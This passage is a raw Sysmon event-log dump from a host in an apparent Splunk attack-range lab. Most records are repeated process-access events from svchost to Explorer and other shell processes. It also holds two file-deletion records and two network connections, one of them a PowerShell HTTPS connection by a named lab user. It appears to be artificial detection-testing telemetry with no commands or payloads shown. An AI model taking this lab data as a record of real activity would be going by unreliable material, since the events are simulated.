23542300x800000000000000036496395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:58.521{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8446CA464D57919B269664FA2B3C6C2A,SHA256=96B9E2F61301C6A14462750E273808CB17A54B4591E6C76E583ECACD8AE5B31D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:26.873{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50406-false10.0.1.12-8000- 23542300x800000000000000036496399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:59.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF8F02A32C7890880B70F83EE595582A,SHA256=46AF43E1546CF8B440425E5645E7BDC5D397DE24A269DE3103DCCD5F1ED3721B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:59.404{B81B27B7-4012-611D-0D00-00000000C801}7922340C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036496397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:28.971{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50407-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036496431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 